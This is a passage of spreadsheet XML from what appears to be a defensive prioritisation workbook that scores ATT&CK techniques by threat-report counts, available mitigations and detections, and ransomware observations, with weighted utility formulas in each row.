        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.17640263449809523</v>
      </c>
      <c r="AR54" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.17640263449809523</v>
      </c>
      <c r="AS54" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT54" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU5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5" spans="1:47" ht="48">
      <c r="A55" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.16861571969666667</v>
      </c>
      <c r="B55" s="25">
        <f>SUM(H55,M55,V55)*(1+SUM(AE55,AG55,AI55,AK55,AM55))</f>
        <v>0.3528238636333334</v>
      </c>
      <c r="C55" s="25" t="s">
        <v>301</v>
      </c>
      <c r="D55" s="25" t="s">
        <v>302</v>
      </c>
      <c r="E55" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F55" s="51">
        <v>2</v>
      </c>
      <c r="G55" s="51">
        <v>1</v>
      </c>
      <c r="H55" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.15000000000000002</v>
      </c>
      <c r="I55">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J55">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K55">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L55">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M55" s="44">
        <v>2.4804909999999999E-2</v>
      </c>
      <c r="N55" s="51">
        <v>0</v>
      </c>
      <c r="O55" s="51">
        <v>1</v>
      </c>
      <c r="P55" s="51">
        <v>0</v>
      </c>
      <c r="Q55" s="51">
        <v>0</v>
      </c>
      <c r="R55" s="52" t="s">
        <v>156</v>
      </c>
      <c r="S55" s="51">
        <v>2</v>
      </c>
      <c r="T55" s="51" t="s">
        <v>303</v>
      </c>
      <c r="U55" s="51">
        <v>7</v>
      </c>
      <c r="V55" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>9.0476190476190474E-2</v>
      </c>
      <c r="W55">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>9</v>
      </c>
      <c r="X55">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Y55">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Z55">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA55">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB55">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC55" s="29" t="s">
        <v>304</v>
      </c>
      <c r="AD55" s="25" t="str" cm="1">
        <f t="array" ref="AD55">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC55)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE55" s="25">
        <f>IF(AD55="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF55" s="25" t="str" cm="1">
        <f t="array" ref="AF55">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC55)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG55" s="25">
        <f>IF(AF55="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH55" s="25" t="str" cm="1">
        <f t="array" ref="AH55">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC55)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI55" s="25">
        <f>IF(AH55="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ55" s="25" t="str" cm="1">
        <f t="array" ref="AJ55">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC55)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK55" s="25">
        <f>IF(AJ55="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL55" s="25" t="str" cm="1">
        <f t="array" ref="AL55">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC55)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM55" s="25">
        <f>IF(AL55="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN55" s="52">
        <v>4</v>
      </c>
      <c r="AO55" s="51">
        <v>1</v>
      </c>
      <c r="AP55" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.16861571969666667</v>
      </c>
      <c r="AQ55" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.11760795454444446</v>
      </c>
      <c r="AR55" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.11760795454444446</v>
      </c>
      <c r="AS55" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT55" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU5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6" spans="1:47" ht="32.1">
      <c r="A56" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.15395503297009525</v>
      </c>
      <c r="B56" s="25">
        <f>SUM(H56,M56,V56)*(1+SUM(AE56,AG56,AI56,AK56,AM56))</f>
        <v>0.20621699636761903</v>
      </c>
      <c r="C56" s="25" t="s">
        <v>305</v>
      </c>
      <c r="D56" s="25" t="s">
        <v>306</v>
      </c>
      <c r="E56" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F56" s="51">
        <v>1</v>
      </c>
      <c r="G56" s="51">
        <v>1</v>
      </c>
      <c r="H56" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I56">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J56">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K56">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L56">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M56" s="44">
        <v>2.451534E-2</v>
      </c>
      <c r="N56" s="51">
        <v>2</v>
      </c>
      <c r="O56" s="51">
        <v>5</v>
      </c>
      <c r="P56" s="51">
        <v>2</v>
      </c>
      <c r="Q56" s="51">
        <v>1</v>
      </c>
      <c r="R56" s="51"/>
      <c r="S56" s="51">
        <v>0</v>
      </c>
      <c r="T56" s="51"/>
      <c r="U56" s="51">
        <v>0</v>
      </c>
      <c r="V56" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="W56">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X56">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y56">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z56">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>10</v>
      </c>
      <c r="AA56">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.1</v>
      </c>
      <c r="AB56">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.1</v>
      </c>
      <c r="AC56" s="29" t="s">
        <v>307</v>
      </c>
      <c r="AD56" s="25" t="str" cm="1">
        <f t="array" ref="AD56">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC56)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE56" s="25">
        <f>IF(AD56="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF56" s="25" t="str" cm="1">
        <f t="array" ref="AF56">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC56)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG56" s="25">
        <f>IF(AF56="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH56" s="25" t="str" cm="1">
        <f t="array" ref="AH56">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC56)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI56" s="25">
        <f>IF(AH56="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ56" s="25" t="str" cm="1">
        <f t="array" ref="AJ56">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC56)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK56" s="25">
        <f>IF(AJ56="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL56" s="25" t="str" cm="1">
        <f t="array" ref="AL56">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC56)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM56" s="25">
        <f>IF(AL56="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN56" s="58">
        <v>4</v>
      </c>
      <c r="AO56" s="51">
        <v>1</v>
      </c>
      <c r="AP56" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.15395503297009525</v>
      </c>
      <c r="AQ56" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.8738998789206349E-2</v>
      </c>
      <c r="AR56" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.8738998789206349E-2</v>
      </c>
      <c r="AS56" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT56" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU5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7" spans="1:47">
      <c r="A57" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.9411886496666669E-2</v>
      </c>
      <c r="B57" s="25">
        <f>SUM(H57,M57,V57)*(1+SUM(AE57,AG57,AI57,AK57,AM57))</f>
        <v>0.19411886496666669</v>
      </c>
      <c r="C57" s="25" t="s">
        <v>308</v>
      </c>
      <c r="D57" s="25" t="s">
        <v>309</v>
      </c>
      <c r="E57" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F57" s="51">
        <v>1</v>
      </c>
      <c r="G57" s="51">
        <v>1</v>
      </c>
      <c r="H57" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I57">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J57">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K57">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L57">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M57" s="44">
        <v>2.2144509999999999E-2</v>
      </c>
      <c r="N57" s="51">
        <v>0</v>
      </c>
      <c r="O57" s="51">
        <v>2</v>
      </c>
      <c r="P57" s="51">
        <v>3</v>
      </c>
      <c r="Q57" s="51">
        <v>0</v>
      </c>
      <c r="R57" s="51"/>
      <c r="S57" s="51">
        <v>0</v>
      </c>
      <c r="T57" s="51"/>
      <c r="U57" s="51">
        <v>0</v>
      </c>
      <c r="V57" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>2.3809523809523808E-2</v>
      </c>
      <c r="W57">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X57">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y57">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z57">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>5</v>
      </c>
      <c r="AA57">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.05</v>
      </c>
      <c r="AB57">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.05</v>
      </c>
      <c r="AC57" s="29" t="s">
        <v>310</v>
      </c>
      <c r="AD57" s="25" t="str" cm="1">
        <f t="array" ref="AD57">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC57)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE57" s="25">
        <f>IF(AD57="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF57" s="25" t="str" cm="1">
        <f t="array" ref="AF57">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC57)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG57" s="25">
        <f>IF(AF57="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH57" s="25" t="str" cm="1">
        <f t="array" ref="AH57">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC57)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI57" s="25">
        <f>IF(AH57="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ57" s="25" t="str" cm="1">
        <f t="array" ref="AJ57">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC57)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK57" s="25">
        <f>IF(AJ57="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL57" s="25" t="str" cm="1">
        <f t="array" ref="AL57">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC57)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM57" s="25">
        <f>IF(AL57="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN57" s="52">
        <v>0</v>
      </c>
      <c r="AO57" s="51">
        <v>0</v>
      </c>
      <c r="AP57" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.9411886496666669E-2</v>
      </c>
      <c r="AQ57" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.4706288322222236E-2</v>
      </c>
      <c r="AR57" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.4706288322222236E-2</v>
      </c>
      <c r="AS57" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT57" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU5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8" spans="1:47" ht="32.1">
      <c r="A58" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.1252377583238098E-2</v>
      </c>
      <c r="B58" s="25">
        <f>SUM(H58,M58,V58)*(1+SUM(AE58,AG58,AI58,AK58,AM58))</f>
        <v>0.51252377583238096</v>
      </c>
      <c r="C58" s="25" t="s">
        <v>311</v>
      </c>
      <c r="D58" s="25" t="s">
        <v>312</v>
      </c>
      <c r="E58" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F58" s="51">
        <v>1</v>
      </c>
      <c r="G58" s="51">
        <v>2</v>
      </c>
      <c r="H58" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.15000000000000002</v>
      </c>
      <c r="I58">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J58">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K58">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L58">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M58" s="44">
        <v>2.189928E-2</v>
      </c>
      <c r="N58" s="51">
        <v>1</v>
      </c>
      <c r="O58" s="51">
        <v>7</v>
      </c>
      <c r="P58" s="51">
        <v>1</v>
      </c>
      <c r="Q58" s="51">
        <v>0</v>
      </c>
      <c r="R58" s="52" t="s">
        <v>313</v>
      </c>
      <c r="S58" s="51">
        <v>5</v>
      </c>
      <c r="T58" s="51" t="s">
        <v>314</v>
      </c>
      <c r="U58" s="51">
        <v>11</v>
      </c>
      <c r="V58" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.19523809523809524</v>
      </c>
      <c r="W58">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>16</v>
      </c>
      <c r="X58">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Y58">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Z58">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>9</v>
      </c>
      <c r="AA58">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.09</v>
      </c>
      <c r="AB58">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.09</v>
      </c>
      <c r="AC58" s="29" t="s">
        <v>315</v>
      </c>
      <c r="AD58" s="25" t="str" cm="1">
        <f t="array" ref="AD58">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC58)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE58" s="25">
        <f>IF(AD58="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF58" s="25" t="str" cm="1">
        <f t="array" ref="AF58">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC58)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG58" s="25">
        <f>IF(AF58="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH58" s="25" t="str" cm="1">
        <f t="array" ref="AH58">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC58)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI58" s="25">
        <f>IF(AH58="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ58" s="25" t="str" cm="1">
        <f t="array" ref="AJ58">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC58)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK58" s="25">
        <f>IF(AJ58="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL58" s="25" t="str" cm="1">
        <f t="array" ref="AL58">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC58)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM58" s="25">
        <f>IF(AL58="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN58" s="59">
        <v>0</v>
      </c>
      <c r="AO58" s="51">
        <v>0</v>
      </c>
      <c r="AP58" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.1252377583238098E-2</v>
      </c>
      <c r="AQ58" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.17084125861079366</v>
      </c>
      <c r="AR58" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.17084125861079366</v>
      </c>
      <c r="AS58" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT58" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU5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9" spans="1:47" ht="63.95">
      <c r="A59" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.7901675340952372E-2</v>
      </c>
      <c r="B59" s="25">
        <f>SUM(H59,M59,V59)*(1+SUM(AE59,AG59,AI59,AK59,AM59))</f>
        <v>0.34568342007619046</v>
      </c>
      <c r="C59" s="25" t="s">
        <v>316</v>
      </c>
      <c r="D59" s="25" t="s">
        <v>317</v>
      </c>
      <c r="E59" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F59" s="51">
        <v>1</v>
      </c>
      <c r="G59" s="51">
        <v>1</v>
      </c>
      <c r="H59" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I59">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J59">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
